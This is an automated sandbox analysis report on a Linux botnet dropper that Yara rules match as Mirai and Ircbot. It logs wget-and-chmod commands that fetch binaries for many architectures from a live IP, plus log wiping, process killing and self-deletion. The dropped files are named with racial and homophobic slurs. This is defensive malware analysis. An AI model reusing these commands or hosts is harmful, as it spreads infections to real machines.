Linux Analysis Report

Overview

General Information

Analysis ID: 1417457
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Deletes system log files
Drops files in suspicious directories
Machine Learning detection for dropped file
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Found strings indicative of a multi-platform dropper
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection

barindex
Source: /tmp/lmao (deleted) Avira: detection malicious, Label: EXP/ELF.Agent.M.28
Source: /tmp/what (deleted) Avira: detection malicious, Label: EXP/ELF.Agent.F.118
Source: /tmp/blyat (deleted) Avira: detection malicious, Label: EXP/ELF.Mirai.W
Source: /tmp/nigga (deleted) Joe Sandbox ML: detected
Source: /tmp/faggot (deleted) Joe Sandbox ML: detected
Source: shiteater (deleted).105.dr String: %s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog
Source: blyat (deleted).114.dr String: %s/%s/proc//proc/%s/cmdlinerwgetcurlnetstatgreppslsmvechokillbashrebootshutdownhaltpowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consoleyouare.geek/dev/watchdog/dev/misc/watchdog/
Source: global traffic TCP traffic: 192.168.2.23:60508 -> 104.168.45.11:7722
Source: global traffic TCP traffic: 192.168.2.23:43278 -> 185.216.70.168:21425
Source: /bin/sh (PID: 6218) Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.sh Jump to behavior
Source: /bin/sh (PID: 6220) Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mips Jump to behavior
Source: /bin/sh (PID: 6233) Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpsl Jump to behavior
Source: /bin/sh (PID: 6258) Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64 Jump to behavior
Source: /bin/sh (PID: 6403) Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/arm Jump to behavior
Source: /bin/sh (PID: 6409) Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5 Jump to behavior
Source: /bin/sh (PID: 6425) Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6 Jump to behavior
Source: /bin/sh (PID: 6430) Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7 Jump to behavior
Source: /bin/sh (PID: 6435) Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586 Jump to behavior
Source: /bin/sh (PID: 6440) Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686 Jump to behavior
Source: /bin/sh (PID: 6447) Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpc Jump to behavior
Source: /bin/sh (PID: 6478) Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4 Jump to behavior
Source: /bin/sh (PID: 6485) Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68k Jump to behavior
Source: /bin/sh (PID: 6501) Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparc Jump to behavior
Source: /tmp/lol (PID: 6222) Socket: 127.0.0.1::39123 Jump to behavior
Source: /tmp/retard (PID: 6411) Socket: 127.0.0.1::39123 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.45.11
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.8.244
Source: global traffic HTTP traffic detected: GET /wtf.sh HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mpsl HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /x86_64 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /arm HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /arm5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /arm6 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /arm7 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /i586 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /powerpc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sh4 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /m68k HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sparc HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 94.156.8.244Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: youare.geek
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp String found in binary or memory: http://94.156.8.244/arm
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/arm5;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/arm6;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/arm7;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/arm;
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp String found in binary or memory: http://94.156.8.244/armwtf.sh;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/i586;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/i686;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/m68k;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/mips;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/mpsl;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/powerpc;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/sh4;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/sparc;
Source: wtf.sh.12.dr String found in binary or memory: http://94.156.8.244/x86_64;
Source: lmao (deleted).26.dr, nigga (deleted).77.dr, what (deleted).89.dr, retard.55.dr, lol.16.dr, faggot (deleted).32.dr, nigger (deleted).65.dr String found in binary or memory: http://upx.sf.net
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: dump.pcap, type: PCAP Matched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown
Source: /tmp/faggot (deleted), type: DROPPED Matched rule: Linux_Trojan_Ircbot_bb204b81 Author: unknown
Source: /tmp/lol (PID: 6224) SIGKILL sent: pid: -6224, result: unknown Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 912, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 918, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1601, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1877, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6226, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6231, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6259, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6403, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 1877, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6430, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6440, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6478, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6485, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6501, result: successful Jump to behavior
Source: /tmp/lol (PID: 6224) SIGKILL sent: pid: -6224, result: unknown Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 912, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 918, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1601, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 1877, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6226, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6231, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6259, result: successful Jump to behavior
Source: /tmp/lol (PID: 6228) SIGKILL sent: pid: 6403, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 1877, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6430, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6440, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6478, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6485, result: successful Jump to behavior
Source: /tmp/retard (PID: 6421) SIGKILL sent: pid: 6501, result: successful Jump to behavior
Source: dump.pcap, type: PCAP Matched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16
Source: /tmp/faggot (deleted), type: DROPPED Matched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16
Source: classification engine Classification label: mal80.spre.evad.lin@0/12@1/0

Data Obfuscation

barindex
Source: /tmp/retard (PID: 6419) Deleted: /dev/kmsg Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6472/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6472/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6471/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6471/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6474/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6474/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6473/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6473/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6476/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6476/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6475/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6475/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6478/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6470/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/6470/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/230/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/110/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/231/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/111/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/232/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/112/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/233/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/113/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/234/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /tmp/retard (PID: 6421) File opened: /proc/114/cmdline Jump to behavior
Source: /bin/sh (PID: 6221) Chmod executable: /usr/bin/chmod -> chmod +x lol Jump to behavior
Source: /bin/sh (PID: 6256) Chmod executable: /usr/bin/chmod -> chmod +x lmao Jump to behavior
Source: /bin/sh (PID: 6399) Chmod executable: /usr/bin/chmod -> chmod +x faggot Jump to behavior
Source: /bin/sh (PID: 6404) Chmod executable: /usr/bin/chmod -> chmod +x gay Jump to behavior
Source: /bin/sh (PID: 6410) Chmod executable: /usr/bin/chmod -> chmod +x retard Jump to behavior
Source: /bin/sh (PID: 6428) Chmod executable: /usr/bin/chmod -> chmod +x nigger Jump to behavior
Source: /bin/sh (PID: 6433) Chmod executable: /usr/bin/chmod -> chmod +x shit Jump to behavior
Source: /bin/sh (PID: 6438) Chmod executable: /usr/bin/chmod -> chmod +x nigga Jump to behavior
Source: /bin/sh (PID: 6443) Chmod executable: /usr/bin/chmod -> chmod +x kekw Jump to behavior
Source: /bin/sh (PID: 6458) Chmod executable: /usr/bin/chmod -> chmod +x what Jump to behavior
Source: /bin/sh (PID: 6481) Chmod executable: /usr/bin/chmod -> chmod +x kys Jump to behavior
Source: /bin/sh (PID: 6499) Chmod executable: /usr/bin/chmod -> chmod +x shiteater Jump to behavior
Source: /bin/sh (PID: 6504) Chmod executable: /usr/bin/chmod -> chmod +x blyat Jump to behavior
Source: /bin/sh (PID: 6506) Rm executable: /usr/bin/rm -> rm wtf.sh Jump to behavior
Source: /bin/sh (PID: 6218) Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.sh Jump to behavior
Source: /bin/sh (PID: 6220) Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mips Jump to behavior
Source: /bin/sh (PID: 6233) Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpsl Jump to behavior
Source: /bin/sh (PID: 6258) Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64 Jump to behavior
Source: /bin/sh (PID: 6403) Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/arm Jump to behavior
Source: /bin/sh (PID: 6409) Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5 Jump to behavior
Source: /bin/sh (PID: 6425) Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6 Jump to behavior
Source: /bin/sh (PID: 6430) Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7 Jump to behavior
Source: /bin/sh (PID: 6435) Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586 Jump to behavior
Source: /bin/sh (PID: 6440) Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686 Jump to behavior
Source: /bin/sh (PID: 6447) Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpc Jump to behavior
Source: /bin/sh (PID: 6478) Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4 Jump to behavior
Source: /bin/sh (PID: 6485) Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68k Jump to behavior
Source: /bin/sh (PID: 6501) Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparc Jump to behavior
Source: /usr/bin/chmod (PID: 6221) File: /tmp/lol (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6404) File: /tmp/gay (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6410) File: /tmp/retard (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/wget (PID: 6220) File written: /tmp/lol Jump to dropped file
Source: /usr/bin/wget (PID: 6233) File written: /tmp/lmao (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6258) File written: /tmp/faggot (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6403) File written: /tmp/gay Jump to dropped file
Source: /usr/bin/wget (PID: 6409) File written: /tmp/retard Jump to dropped file
Source: /usr/bin/wget (PID: 6425) File written: /tmp/nigger (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6430) File written: /tmp/shit (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6435) File written: /tmp/nigga (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6447) File written: /tmp/what (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6485) File written: /tmp/shiteater (deleted) Jump to dropped file
Source: /usr/bin/wget (PID: 6501) File written: /tmp/blyat (deleted) Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/retard (PID: 6419) Log files deleted: /var/log/kern.log Jump to behavior
Source: /usr/bin/wget (PID: 6218) File: /usr/bin/wtf.sh Jump to dropped file
Source: /tmp/lol (PID: 6222) File: /tmp/lol Jump to behavior
Source: /tmp/retard (PID: 6411) File: /tmp/retard Jump to behavior
